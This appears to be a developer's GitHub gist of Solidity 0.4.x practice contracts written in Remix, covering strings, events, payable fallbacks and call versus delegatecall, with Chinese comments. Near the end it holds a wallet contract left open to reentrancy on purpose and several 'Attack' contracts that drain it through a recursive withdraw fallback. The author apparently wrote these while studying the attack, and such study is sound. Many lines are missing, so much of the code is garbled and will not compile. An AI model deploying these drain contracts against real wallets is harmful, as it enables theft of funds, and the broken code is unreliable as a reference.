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Created October 14, 2018 15:44
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Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at
pragma solidity 0.4.25;
contract DemoTypes303 {
string[] strArr;
function add(string str) public {
function getStrAt(uint n) public constant returns (string s){
string storage tmp = strArr[n];
return tmp;
function updateStrAt(uint n, string str) public {
strArr[n] = str;
function deleteStrAt(uint index) public {
uint len = strArr.length;
if (index >= len) return;
for (uint i = index; i<len-1; i++) {
strArr[i] = strArr[i+1];
delete strArr[len-1];
pragma solidity ^0.4.25;
contract Demo{
uint public value1 = 0;
uint public value2 = 0;
function A(uint v) public returns(uint){
value1 += v;
return value1;
function B(uint v) public{
value2 += A(v);
pragma solidity ^0.4.19;
contract BytesOrStrings {
string constant _string = " Medium";
bytes32 constant _bytes = " Medium";
function getAsString() public pure returns(string) {
return _string;
function getAsBytes() public pure returns(bytes32) {
return _bytes;
contract BytesOrStringsOverSize {
string constant _string = " Medium! abcdefghjklmnopqrstuvwsyz";
//bellow line raise error: TypeError: Type literal_string " Medium! abcdefghjklmnopqrstuvwsyz" is not implicitly convertible to expected type bytes32.
// bytes32 constant _bytes = " Medium! abcdefghjklmnopqrstuvwsyz";
bytes32 constant _bytes = "crypt";
function getAsString() public pure returns(string) {
return _string;
function getAsBytes() public pure returns(bytes32) {
return _bytes;
import "";
contract StringTest{
using strings for *;
function concat() public pure returns(string) {
return "abc".toSlice().concat("def".toSlice());
function concat2() public returns(string) {
return "123".toSlice().concat("456".toSlice());
contract BytesTest{
bytes public bs;
function push(byte b) public { //GOOGLE: solidity remix pass byte value to function
// function push(char b) public { // WYH: No such char type !
function getAsString() public view returns(uint, string) {
return (bs.length, string(bs));
pragma solidity 0.4.25;
contract stringOpTest {
byte[] bs;
function convertingToString()public returns(string){
// bytes32 memory hw = "Hello World"; // TypeError: Storage location can only be given for array or struct types.
bytes32 hw = "Hello World"; //
// string memory converted = string(hw); // TypeError: Explicit type conversion not allowed from "bytes32" to "string storage pointer".
bytes memory bytesArray = new bytes(32);
for (uint256 i=0; i < 32; i++) {
bytesArray[i] = hw[i];
string memory converted = string(bytesArray);
return converted;
function byteAppend(byte b) {
// bs.append ??
pragma solidity ^0.4.25;
contract CA{
uint public p;
event e(address add,uint p);
function fun(uint u1,uint u2)public{
p = u1 + u2;
emit e(msg.sender,p);
contract CB{
uint public q;
bool public b;
function CB() public payable {
function call1(address add)public returns(bool) {
b ="fun(uint256,uint256)")),2,3);
return b;
function call2(address add)public returns(bool){
b = add.delegatecall(bytes4(keccak256("fun(uint256,uint256)")),1,2);
return b;
function sendDemo(address add) public{
uint u = 1 ether;
pragma solidity ^0.4.2;
contract parent{
string public name;
event ConstrutEvt(string flag, string _name );
function parent(string _name) public{
emit ConstrutEvt("parent::ctor", _name);
contract child is parent{
function child(string _name) {
emit ConstrutEvt("child::ctor", _name);
pragma solidity ^0.4.9;
contract Rejector {
event ConstrutEvt(string flag, address sender );
event FallbackEvt(string flag, address sender, uint aWei );
constructor() public {
emit ConstrutEvt("Rejector::", msg.sender );
function() public {
emit FallbackEvt("Rejector::", msg.sender, msg.value );
contract RejectEther is Rejector{
event ConstrutEvt(string flag, address sender );
constructor() public {
emit ConstrutEvt("RejectEther", msg.sender );
contract AcceptEther{
address owner = msg.sender;
event ConstrutEvt(string flag, address sender, uint aWei );
event FallbackEvt(string flag, address sender, uint aWei );
event LogValue(string flag, address sender, uint aWei );
function() public payable {
emit FallbackEvt("AcceptEther::", msg.sender, msg.value );
constructor() public payable {
emit ConstrutEvt("AcceptEther", msg.sender, msg.value );
function getBalance() public view returns (uint) {
return address(this).balance;//0
function deposit() public payable returns(address addr, uint amount){
//msg.sender 全局变量,调用合约的发起方
//msg.value 全局变量,调用合约的发起方转发的货币量,以wei为单位。
//send() 执行的结果
emit LogValue("AcceptEther", msg.sender, msg.value );
return (msg.sender, msg.value );
function kill() public { //self-destruct function,
if(msg.sender == owner) {
contract etherSender{
function send_1(address receiver) public {
receiver.send(2 ether);
function send_2(address receiver) public {
receiver.send(2 ether);
contract AcceptEtherWithoutFallback{
address owner = msg.sender;
event ConstrutEvt(string flag, address sender, uint aWei );
event FallbackEvt(string flag, address sender, uint aWei );
event LogValue(string flag, address sender, uint aWei );
// function() public payable {
// emit FallbackEvt("AcceptEther::", msg.sender, msg.value );
// }
constructor() public payable {
emit ConstrutEvt("AcceptEther", msg.sender, msg.value );
function getBalance() public view returns (uint) {
return address(this).balance;//0
function deposit() public payable returns(address addr, uint amount){
//msg.sender 全局变量,调用合约的发起方
//msg.value 全局变量,调用合约的发起方转发的货币量,以wei为单位。
//send() 执行的结果
emit LogValue("AcceptEther", msg.sender, msg.value );
return (msg.sender, msg.value );
function kill() public { //self-destruct function,
if(msg.sender == owner) {
pragma solidity ^0.4.25;
contract EventFilterTest {
constructor() public {
b = 0x12345678901234567890123456789012;
event Event(uint indexed a, bytes32 b) ;
event Event2(uint indexed a, bytes32 b) ;
function foo(uint a) public {
b = bytes32(1);
emit Event(a, b);
emit Event2(a, b);
bytes32 b;
pragma solidity ^0.4.25;
contract SimpleStorage {
uint public data;
// event SetX(address indexed _from, uint value);
event Set(string label, uint value);
function set(uint x) public {
data = x;
// emit SetX(msg.sender, x);
// emit Set("#####", x);
pragma solidity ^0.4.0;
contract MathTest {
uint256 public price = 2 ether;
uint256 public quantity = 2**200;
function addTest() external pure returns(uint256, uint256, uint256) {
uint256 u; // range: [0, 2**256)
u = 2**256 - 1;
assert(u + 1 == 0);
return (u, u+1, u+2);
function batchTransfer(address[] receivers, uint256 value) public pure {
uint256 amount = receivers.length * value;
// 如果用户构造的receivers.length 乘以 value 刚好为 0 ,那么就有问题了!
function buy() public payable returns(bool, uint256) {
uint256 weiAmount = msg.value; //WYH: input fund will be convert to amount in wei uint!
require(msg.value >= 2 ether, "value must greater than 2 ether");
return (true, weiAmount);
function tranfsLimitFund() public payable returns(bool, uint256) {
uint256 weiAmount = msg.value; //WYH: input fund will be convert to amount in wei uint!
require(msg.value <= 2 ether, "value must no more than 2 ether");
return (true, weiAmount);
} //测试结果: require或者assert失败时, msg.value会原路退回---也就是合约方法的调用者账户中的钱不会丢失!
pragma solidity 0.4.25;
contract C {
uint[] data1;
uint[] data2;
function appendOne() public {
function appendTwo() public {
function append(uint[] storage d) internal {
function getData1() view public returns(uint[]){
return data1;
function getData2() view public returns(uint[]){
return data2;
contract C2 {
uint public someVariable ;
uint[] public data;
function f() public {
uint[] x;
data = x;
contract ConstantTest{
uint constant var1=now;
uint var2=now;
function checkConstant() returns(uint,uint){
return (var1,var2);
function getVar1() returns(uint){ return var1;}
function getVar2() returns(uint){ return var2;}
pragma solidity 0.4.25;
import "";
contract A{
using strings for *;
string public flags ;
string myName;
address public owner;
string callResult ="R:";
event Ret(string flag, address sender, address owner);
event ConstrutEvt(string flag, address owner );
function A() public{
owner = msg.sender;
emit ConstrutEvt("A", msg.sender);
function setMyName(string name) public {
myName = name;
function doSomething() public view returns(string flag, address sender, address owner){
// does something
// callResult = callResult + "A::doSomething()";
// string old = flags;
flags = flags.toSlice().concat("A::doSomething()".toSlice());
emit Ret("A::doSomething", msg.sender, owner);
return ("A::doSomething", msg.sender, owner);
contract B is A{
// using strings for *;
address public Bsender;
function doSomething() public view returns(string flag, address sender, address owner){
// require(msg.sender == owner);
Bsender = msg.sender;
// do something like A but restrict this function execution to owner
flags = flags.toSlice().concat("B::doSomething()".toSlice());
emit Ret("B::doSomething", msg.sender, owner);
return ("B::doSomething", msg.sender, owner);
} // Got result: 'A::doSomething()B::doSomething()'
function getMyName() public view returns(string name) {
return myName;
contract EvilDoer{
address owner;
constructor() public payable {
owner = msg.sender;
function doSomethingEvil(address addressOfdeployedB) public {
A contractA = A(addressOfdeployedB);
A contractB = new B();
function doSomethingEvil2(address addressOfdeployedB) public {
A contractB = A(addressOfdeployedB);
pragma solidity 0.4.25;
contract A{
address public owner;
function A() public{
owner = msg.sender;
function doSomething() public{
// does something
contract B is A{
function doSomething() public{
// require(msg.sender == owner);
// do something like A but restrict this function execution to owner
contract EvilDoer{
address owner;
constructor() public payable {
owner = msg.sender;
function doSomethingEvil(address addressOfdeployedB) public {
A contractB = new B();
function doSomethingEvil2(address addressOfdeployedB) public {
A contractB = A(addressOfdeployedB);
contractB.doSomething(); //Why Failed? Error message is: 'The constructor should be payable if you send value.'
pragma solidity 0.4.25;
contract A{
address public owner;
event Ret(string flag, address sender, address owner);
event ConstrutEvt(string flag, address owner );
function A() public{
owner = msg.sender;
emit ConstrutEvt("A", msg.sender);
function doSomething() public view returns(string flag, address sender, address owner){
emit Ret("A::doSomething", msg.sender, owner);
return ("A::doSomething", msg.sender, owner);
contract EvilDoer{
function doSomethingEvil(address instanceAddrOfA) public {
A contractA = A(instanceAddrOfA);
//call this way, 'owner' value print inside the doSomething() is zero, why ?
// But if invoke doSomething() direct from remix IDE run tab, it showthat 'owner' has non-zero value if watch from addressOfdeployedB's view.
pragma solidity 0.4.25;
contract A{
address public owner;
event Ret(string flag, address sender, address owner);
event ConstrutEvt(string flag, address owner );
function A() public{
owner = msg.sender;
emit ConstrutEvt("A", msg.sender);
function doSomething() public returns(string, address, address _owner){
emit Ret("A::doSomething", msg.sender, owner);
return ("A::doSomething", msg.sender, owner);
contract EvilDoer{
function doSomethingEvil(address instanceAddrOfA) public {
A contractA = A(instanceAddrOfA);
//call this way, 'owner' value print inside the doSomething() is zero, why ?
// But if invoke doSomething() direct from remix IDE run tab, it showthat 'owner' has non-zero value if watch from addressOfdeployedB's view.
pragma solidity 0.4.25;
contract A{
string myName;
address public owner;
event Ret(string flag, address sender, address owner);
event ConstrutEvt(string flag, address owner );
function A() public{
owner = msg.sender;
emit ConstrutEvt("A", msg.sender);
function setMyName(string name) public {
myName = name;
function doSomething() public view returns(string flag, address sender, address owner){
// does something
emit Ret("A::doSomething", msg.sender, owner);
return ("A::doSomething", msg.sender, owner);
contract B is A{
address public Bsender;
function doSomething() public view returns(string flag, address sender, address owner){
Bsender = msg.sender;
// do something like A but restrict this function execution to owner
emit Ret("B::doSomething", msg.sender, owner);
return ("B::doSomething", msg.sender, owner);
function getMyName() public view returns(string name) {
return myName;
contract EvilDoer{
address owner;
constructor() public payable {
owner = msg.sender;
function doSomethingEvilA(address addressOfdeployedB) public {
A contractA = A(addressOfdeployedB);
function doSomethingEvilB(address addressOfdeployedB) public {
B contractB = B(addressOfdeployedB);
contractB.doSomething(); //call this way, 'owner' value print inside the doSomething() Log is zero, why ?
// i can see that 'owner' has non-zero value if watch from addressOfdeployedB's view.
pragma solidity ^0.4.0;
contract PayTest {
function() public payable {}
function getBalance() public view returns (uint) {
return address(this).balance;//0
function deposit() payable public returns(address addr, uint amount){
//msg.sender 全局变量,调用合约的发起方
//msg.value 全局变量,调用合约的发起方转发的货币量,以wei为单位。
//send() 执行的结果
return (msg.sender, msg.value );
pragma solidity ^0.4.10;
contract IDMoney {
address owner;
mapping (address => uint256) balances; // 记录每个打币者存入的资产情况
event withdrawLog(address, uint256);
function IDMoney() { owner = msg.sender; }
function deposit() payable { balances[msg.sender] += msg.value; }
function withdraw(address to, uint256 amount) {
require(balances[msg.sender] > amount);
require(this.balance > amount);
withdrawLog(to, amount); // 打印日志,方便观察 reentrancy; // 使用 call.value()() 进行 ether 转币时,默认会发所有的 Gas 给外部
balances[msg.sender] -= amount;
function balanceOf() returns (uint256) { return balances[msg.sender]; }
function balanceOf(address addr) returns (uint256) { return balances[addr]; }
contract Attack {
address owner;
address victim;
modifier ownerOnly { require(owner == msg.sender); _; }
function Attack() payable { owner = msg.sender; }
// 设置已部署的 IDMoney 合约实例地址
function setVictim(address target) ownerOnly { victim = target; }
// deposit Ether to IDMoney deployed
function step1(uint256 amount) ownerOnly payable {
if (this.balance > amount) {"deposit()")));
// withdraw Ether from IDMoney deployed
function step2(uint256 amount) ownerOnly {"withdraw(address,uint256)")), this, amount);
// selfdestruct, send all balance to owner
function stopAttack() ownerOnly {
function startAttack(uint256 amount) ownerOnly {
step2(amount / 2);
function () payable {
if (msg.sender == victim) {
// 再次尝试调用 IDCoin 的 sendCoin 函数,递归转币"withdraw(address,uint256)")), this, msg.value);
pragma solidity ^0.4.10;
contract IDMoney{
address public _owner;
mapping (address => uint256) public balances;
event LogDeposit(string flag, address _addr, uint256 _val);
event LogWithdraw(string flag, address _addr, uint256 _remain);
constructor() payable public {
_owner = msg.sender; //构造函数中的msg.sender只能是创建者
function deposit() public payable {
balances[msg.sender] += msg.value;
emit LogDeposit("IDMoney", msg.sender, msg.value);
function withdraw(address to, uint256 amount) public payable {
emit LogWithdraw("IDMoney", msg.sender, balances[msg.sender]);
require(balances[msg.sender] >= amount); //公共钱包中调用者的余额是否足够
require(address(this).balance >= amount); //该合约资产是否足够
//WYH: blog's version is wrong! No need to convert uint!
//*10**18)(); //此处amount单位是wei,这里我换算成ether
// balances[msg.sender] -= amount*10**18;
//; //WYH: must use call.value()() if want to reproduce RetrenceAttack! Should not replace wwith transfer()!
balances[msg.sender] -= amount;
function balanceof(address to) public constant returns(uint256){
return balances[to];
function getMyBalance() public view returns (uint) {
return address(this).balance;//0
// selfdestruct, send all balance to owner
function kill() public {
contract Attack {
address public owner;
address public victim;
// IDMoney attackTarget;
event LogFallback(string flag, address _addr, uint256 _val);
event LogCall(string flag, address _addr, uint256 _val);
event LogStartAttack(string flag, address _addr, uint256 _val);
modifier ownerOnly { require(owner == msg.sender); _; }
constructor() public payable { owner = msg.sender; }
// 设置已部署的 IDMoney 合约实例地址
function setVictim(address target) public ownerOnly { victim = target; }
// deposit Ether to IDMoney deployed
function step1(uint256 amount) public ownerOnly payable {
emit LogCall("-->IDMoney::deposit", msg.sender, amount);
if (address(this).balance > amount) {
emit LogCall("-->IDMoney::deposit2", msg.sender, amount);"deposit()")));
// IDMoney(victim).deposit();
// withdraw Ether from IDMoney deployed
function step2(uint256 amount) public ownerOnly {
emit LogCall("-->IDMoney::withdraw", this, amount);
// rang让withdraw()ba把qian把钱zhuan把钱转到参数2(this)指定的账户中"withdraw(address,uint256)")), this, amount);
// IDMoney(victim).withdraw(this, amount);
// selfdestruct, send all balance to owner
function stopAttack() public ownerOnly {
function startAttack(uint256 amount) public ownerOnly {
emit LogStartAttack("Attack", 0x0, amount);
step2(amount / 2);
function () public payable {
emit LogFallback("Attack", msg.sender, msg.value);
if (msg.sender == victim) {
emit LogFallback("Attack--B", msg.sender, msg.value);
// 再次尝试调用 IDCoin 的 sendCoin 函数,递归转币"withdraw(address,uint256)")), this, msg.value);
// IDMoney(victim).withdraw(this, msg.value);
function deposit() public payable {
emit LogCall("-->Attack::deposit", msg.sender, msg.value);
function getMyBalance() public view returns (uint) {
return address(this).balance;//0
contract AttackT {
address public owner;
address public victim;
// IDMoney attackTarget;
event LogFallback(string flag, address _addr, uint256 _val);
event LogCall(string flag, address _addr, uint256 _val);
event LogStartAttack(string flag, address _addr, uint256 _val);
modifier ownerOnly { require(owner == msg.sender); _; }
constructor() public payable { owner = msg.sender; }
// selfdestruct, send all balance to owner
function kill() public ownerOnly {
function () public payable {
emit LogFallback("Attack", msg.sender, msg.value);
function deposit() public payable {
emit LogCall("-->Attack::deposit", msg.sender, msg.value);
function getMyBalance() public view returns (uint) {
return address(this).balance;//0
contract AttackOri {
address owner;
address victim;
modifier ownerOnly { require(owner == msg.sender); _; }
function AttackOri() payable { owner = msg.sender; }
// 设置已部署的 IDMoney 合约实例地址
function setVictim(address target) ownerOnly { victim = target; }
// deposit Ether to IDMoney deployed
function step1(uint256 amount) ownerOnly payable {
if (this.balance > amount) {"deposit()")));
// withdraw Ether from IDMoney deployed
function step2(uint256 amount) ownerOnly {"withdraw(address,uint256)")), this, amount);
// selfdestruct, send all balance to owner
function stopAttack() ownerOnly {
function startAttack(uint256 amount) ownerOnly {
step2(amount / 2);
function () payable {
if (msg.sender == victim) {
// 再次尝试调用 IDCoin 的 sendCoin 函数,递归转币"withdraw(address,uint256)")), this, msg.value);
function deposit() public payable {
function getMyBalance() public view returns (uint) {
return address(this).balance;//0
pragma solidity 0.4.25;
contract InfoFeed {
address owner;
owner = msg.sender;
function info() returns (uint ret) { return 42; }
function getBalance() public returns (uint) {
return this.balance;
function kill() public {
if (owner == msg.sender) { // 检查谁在调用
selfdestruct(owner); // 销毁合约
contract Consumer {
InfoFeed public feed; // points to contract on blockchain
constructor() {
// 会触发构造函数!
feed = new InfoFeed(); // new instance created; constructor called
function getBalance() public returns (uint) {
return this.balance;
function doTransfer(uint val) {
pragma solidity ^0.4.25;
contract EthToContract {
uint256 public counter = 5; //state variable we assigned earlier
address public owner = msg.sender; //set owner as msg.sender
function add() public { //increases counter by 1
function subtract() public { //decreases counter by 1
function getCounter() public constant returns (uint256) {
return counter;
function kill() public { //self-destruct function,
if(msg.sender == owner) {
pragma solidity ^0.4.17;
contract SimpleStorage {
uint myVariable;
event Deposit(address indexed _from, address indexed _to, uint value);
event Set(address indexed from, uint value);
function set(uint x) public {
myVariable = x;
emit Set(msg.sender, x);
function get() constant public returns (uint) {
return myVariable;
// 向别的地址存款:
function depositTo(address to) public {
emit Deposit(msg.sender, to, msg.value);
// ...
function() public payable {
function getBalance() public view returns (uint) {
return address(this).balance;//0
function deposit() payable public returns(address addr, uint amount){
//msg.sender 全局变量,调用合约的发起方
//msg.value 全局变量,调用合约的发起方转发的货币量,以wei为单位。
//send() 执行的结果
emit Deposit(msg.sender, address(this), msg.value);
return (msg.sender, msg.value );
pragma solidity ^0.4.25;
contract Rejector {
// function() { throw; }
contract Counter is Rejector
uint public count = 10;
event DefaultCalledEvt(string flag, address owner);
function inc(uint num) public returns(uint) {
return count += num;
function() private { //WYH: ? should i make it public visible ?
emit DefaultCalledEvt("Counter::", this);
contract Counter_WithException
uint public count = 10;
event DefaultCalledEvt(string flag, address owner);
function inc(uint num) public returns(uint) {
return count += num;
assert(false); // raise exception if false;
function() private { //WYH: ? should i make it public visible ?
emit DefaultCalledEvt("Counter_WithException::", this);
contract CallCounter {
function callByAddr(address addr) public returns(uint) {
uint ret= Counter(addr).inc(2); //WYH: attention, u can get return value anyway!!!
return ret;
contract Caller_by_delegate_without_count {
uint public test_number = 1;
//执行callByDelegate()后,test_number值 会增加2 , 而不是Counter中的count值增加2!!!
//(更准确地说:是与被调用合约的函数中操作的状态变量的偏移,根据这个偏移找到调用合约中的该位置处的数据进行操作! )会增加2~
event DefaultCalledEvt(string flag, address owner);
function callByDelegate(address addr) public returns(bool) {
bytes4 methodId = bytes4(keccak256("inc(uint256)"));
bool ret = addr.delegatecall(methodId, 2);
return ret;
function() private { //WYH: ? should i make it public visible ?
emit DefaultCalledEvt("Caller_by_delegate_without_count::", this);
contract Caller_by_call {
uint public test_number = 111;
event DefaultCalledEvt(string flag, address owner);
event RetValue(string flag, bool);
function callByCall(address addr) public returns(bool) {
bytes4 methodId ;
methodId = bytes4(keccak256("inc(uint256)"));
bool ret =, 2);
return ret;
function callByCallNonExisted(address addr) public returns(bool) {
bytes4 methodId;
// methodId[0] = 2;
methodId = 0x01020304;
bool ret =, 2); // return true! when will return false? when Out of Gas?
// failed(due to forged selector) and Fallback func of contract 'Counter' was called!
//Summary: if raise exception inside the call(), then ret value is false!
emit RetValue("Caller_by_call::callByCallNonExisted", ret);
return ret;
function() private { //WYH: ? should i make it public visible ?
emit DefaultCalledEvt("Caller_by_call::", this);
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